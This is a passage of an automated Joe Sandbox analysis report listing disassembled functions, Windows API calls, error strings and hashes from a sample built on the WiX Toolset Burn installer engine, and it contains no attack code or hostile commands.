                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorLastProcess
                                                                                                                                                                  • String ID: CreateProcessW failed with return code: %d$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 2919029540-2527134587
                                                                                                                                                                  • Opcode ID: 34326a401d9c847ec97b53b4b049ec173886e39c90c49a52534fd91f8dda945e
                                                                                                                                                                  • Instruction ID: 7c95595e11b390fb440b84806160e5c8200d2be42af7e3cf3a697ce42477bb55
                                                                                                                                                                  • Opcode Fuzzy Hash: 34326a401d9c847ec97b53b4b049ec173886e39c90c49a52534fd91f8dda945e
                                                                                                                                                                  • Instruction Fuzzy Hash: 93112E7AA40268B7EB219E528C4AEDF7E3DEFC4B50F054015FE04AB290E2748951CBB0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0093EB41: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0093E01F,?,?,?), ref: 0093EB69
                                                                                                                                                                    • Part of subcall function 0093EB41: GetLastError.KERNEL32(?,0093E01F,?,?,?), ref: 0093EB73
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 0093E02D
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093E037
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 2170121939-336985225
                                                                                                                                                                  • Opcode ID: 289391f37aeebaaa57f8a5b074c93a847cbca066ffbe8e87347a356c669ce9df
                                                                                                                                                                  • Instruction ID: 9ee57dbaa92f56a7d03e467de73a76362700a956f515b0d6d3b9aea349d1db96
                                                                                                                                                                  • Opcode Fuzzy Hash: 289391f37aeebaaa57f8a5b074c93a847cbca066ffbe8e87347a356c669ce9df
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D110672A45229BBCB209F55DC09F8B7B6CFF48BA4F010114FD04AB291D270DC10DAD0
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000000,00000000,0092CE5F,00000000,00000000,00000000,?,?,?,00972BE6,?,?,?), ref: 00973F95
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00972BE6,?,?,?), ref: 00973F9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: Failed to write data to file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 442123175-1082378667
                                                                                                                                                                  • Opcode ID: d9927f0b235e45664ca9028e5b249be584e19ddfe121eea660dafdd3d60f1dde
                                                                                                                                                                  • Instruction ID: 277fe857300e6c82afbdfa6a971ac327308d9cb240ed2262b359c77d0c000b11
                                                                                                                                                                  • Opcode Fuzzy Hash: d9927f0b235e45664ca9028e5b249be584e19ddfe121eea660dafdd3d60f1dde
                                                                                                                                                                  • Instruction Fuzzy Hash: FA017573B40228BBE7119A98DC85FEFB67CDB95B95F118119F908E7140E674DE0066E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739F5
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739FF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to set file pointer.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 2976181284-4026511950
                                                                                                                                                                  • Opcode ID: 4ea2e9f83b517334b760834949baff63ef1c77bd2693df68e16be32cec445267
                                                                                                                                                                  • Instruction ID: 325ebb65707c678f632ff00d99dfb04558db919e0fbf3aedc069ce37a10ff948
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ea2e9f83b517334b760834949baff63ef1c77bd2693df68e16be32cec445267
                                                                                                                                                                  • Instruction Fuzzy Hash: CB01B573600229BBDB248F44DC46EAF7AACDF85764F018029FD49AB250E270CE10E6F0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0093E01F,?,?,?), ref: 0093EB69
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093E01F,?,?,?), ref: 0093EB73
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move to virtual file pointer.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-2079782632
                                                                                                                                                                  • Opcode ID: 0207777d14e170630cb4062ee85f6a11e4dc1f8db66960dae26b795667d4c3bd
                                                                                                                                                                  • Instruction ID: 353969beefb94dba63904829e30e15e47807be976a5ef593a71595a5c59b2f19
                                                                                                                                                                  • Opcode Fuzzy Hash: 0207777d14e170630cb4062ee85f6a11e4dc1f8db66960dae26b795667d4c3bd
                                                                                                                                                                  • Instruction Fuzzy Hash: D701F57764023A77D72246568C09FABFE6CEF417B0F018125FE18A6290D6359C209AD0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000), ref: 00911136
                                                                                                                                                                    • Part of subcall function 009179D1: lstrlenW.KERNEL32(burn.clean.room,?,?,?,00911144,?,?,00000000), ref: 009179EF
                                                                                                                                                                    • Part of subcall function 009179D1: CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,00911144,?,?,00000000), ref: 00917A1F
                                                                                                                                                                    • Part of subcall function 00911651: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,0091114D), ref: 00911658
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?), ref: 00911191
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run application., xrefs: 0091116F
• D:\a\wix4\wix4\src\burn\stub\stub.cpp, xrefs: 0091117E
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseCompareCreateFileHandleHeapInformationStringlstrlen
• String ID: D:\a\wix4\wix4\src\burn\stub\stub.cpp$Failed to run application.
• API String ID: 4127744429-3638059706
APIs
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,00000000,00000002,00000002,?,0092A612,00000008,?), ref: 0092A072
Strings
• Logging, xrefs: 00929FFF
• SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00929FE8
Similarity
• API ID: Close
• String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
• API String ID: 3535843008-387823766
APIs
• RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096CC1C, 0096CC22, 0096CC39
• Failed to open registry key, root: %x, subkey: %ls., xrefs: 0096CC2E
Similarity
• API ID: Open
• String ID: Failed to open registry key, root: %x, subkey: %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 71445658-2584571730
APIs
• CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
Strings
• d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
• Failed to initialize Cryputil., xrefs: 00917BE6
Similarity
• API ID: Uninitialize
• String ID: Failed to initialize Cryputil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
• API String ID: 3861434553-397782128
APIs
• CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
Strings
• d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
• Failed to initialize engine state., xrefs: 00917B61
Similarity
• API ID: Uninitialize
• String ID: Failed to initialize engine state.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
• API String ID: 3861434553-3105230827
APIs
• CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
Strings
• d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
• Failed to initialize Regutil., xrefs: 00917C13
Similarity
• API ID: Uninitialize
• String ID: Failed to initialize Regutil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
• API String ID: 3861434553-4164290783
APIs
• CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
Strings
• d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
• Failed to parse command line., xrefs: 00917B1F
Similarity
• API ID: Uninitialize
• String ID: Failed to parse command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
• API String ID: 3861434553-3869882359
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,?,0093DE2B,?), ref: 009155D3
• RtlFreeHeap.NTDLL(00000000,?,?,0093DE2B,?), ref: 009155DA
• GetLastError.KERNEL32(?,?,0093DE2B,?), ref: 009155E4
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: Heap$ErrorFreeLastProcess
• String ID:
• API String ID: 406640338-0
APIs
• GetCurrentProcess.KERNEL32(0095E74E,?,0095E63E,00000000,?,?,0095E74E,A68EAB5A,?,0095E74E), ref: 0095E655
• TerminateProcess.KERNEL32(00000000,?,0095E63E,00000000,?,?,0095E74E,A68EAB5A,?,0095E74E), ref: 0095E65C
• ExitProcess.KERNEL32 ref: 0095E66E
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
Strings
• Failed to run per-user mode., xrefs: 00917E78
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: Uninitialize
• String ID: Failed to run per-user mode.
• API String ID: 3861434553-1208236218
APIs
• GetProcessHeap.KERNEL32(?,00000000,?,?,009154FB,00000000,00000000,00000001,00000000,00000000,?,00000000,?,?,00000000,?), ref: 009156D6
• RtlReAllocateHeap.NTDLL(00000000,?,009154FB,00000000,00000000,00000001,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 009156DD
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
APIs
• EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,?,0096A9A3,?,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 0096B3FD
• LeaveCriticalSection.KERNEL32(009AD4F0,?,?,0096A9A3,?,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 0096B40E
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
APIs
• RegQueryValueExW.KERNELBASE(?,?,0096D0F5,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0096CDF4,00000000), ref: 0096C2F7
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
APIs
  • Part of subcall function 0096AC32: CloseHandle.KERNELBASE(FFFFFFFF,?,0096B428,00000000,00000000,?,00918106), ref: 0096AC55
• DeleteCriticalSection.KERNEL32(009AD4F0,00000000,00000000,?,00918106,00000000,?,?,?,?), ref: 0096B437
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
APIs
  • Part of subcall function 0097C4F6: RtlAcquireSRWLockExclusive.NTDLL ref: 0097C513
• DloadProtectSection.DELAYIMP ref: 0097C475
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C183
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C183
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C183
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: f3757856783a8ca91d1470b168929d9ab822466b715705b266a8a54f1dd178a8
                                                                                                                                                                  • Instruction ID: 44178a820a8c206c616fe8db3597aff0ab84c8a442629110d64ab1509f84aa61
                                                                                                                                                                  • Opcode Fuzzy Hash: f3757856783a8ca91d1470b168929d9ab822466b715705b266a8a54f1dd178a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 91B012C335C102AF311451159C42E36054CC2C2F15371E43FB808C0042D4894C440177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: ea5d5d63ecce094d4806d5664461fa2e965ffb2c54b6e535e902956c7cac6934
                                                                                                                                                                  • Instruction ID: 6c7540e6830e209e4a23580ac4b6bfc7fa40ba61bb64b3cff7918f6a933ddc32
                                                                                                                                                                  • Opcode Fuzzy Hash: ea5d5d63ecce094d4806d5664461fa2e965ffb2c54b6e535e902956c7cac6934
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FB012C335D1066F311451059C02F36014CD6C2F153B0E82FB408C1042D4894C400177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 589e519f36e7cb1df3a2957b0878118915cda39dffb91c58cb4e89640e7f2b5b
                                                                                                                                                                  • Instruction ID: c09931adf22ff769c4ec09ed0619148cd4eb3bea3775d8ba8c4aaac08f936338
                                                                                                                                                                  • Opcode Fuzzy Hash: 589e519f36e7cb1df3a2957b0878118915cda39dffb91c58cb4e89640e7f2b5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 62B012C335C1026F311451159D42E36054CC2C2F15370E43FB408C0042D48A4C4501B7
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 81b59257671183f6cbdd9acc4c33e0cbe51e743cccef409ab72376acfe281598
                                                                                                                                                                  • Instruction ID: 994165620ba5e76ebafd7151503cc8d5c580ba68f4d93993faafddb8e42ec1e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 81b59257671183f6cbdd9acc4c33e0cbe51e743cccef409ab72376acfe281598
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB012C335C2026F321451159C02E37094CC2C2F15370E53FB408C0142D48A4C880177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: febdfad0601dcec197a4beb5d8cad55dc2ee9715b3578581c8b442263b24910e
                                                                                                                                                                  • Instruction ID: 85882fb245dad7de0a559ec6c8238a4dea33857691d4f324b6c26b46ecae9d87
                                                                                                                                                                  • Opcode Fuzzy Hash: febdfad0601dcec197a4beb5d8cad55dc2ee9715b3578581c8b442263b24910e
                                                                                                                                                                  • Instruction Fuzzy Hash: B4B012C335D102AF311451059C42E36015CC2C2F15371E42FB808C1042D4894C440177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
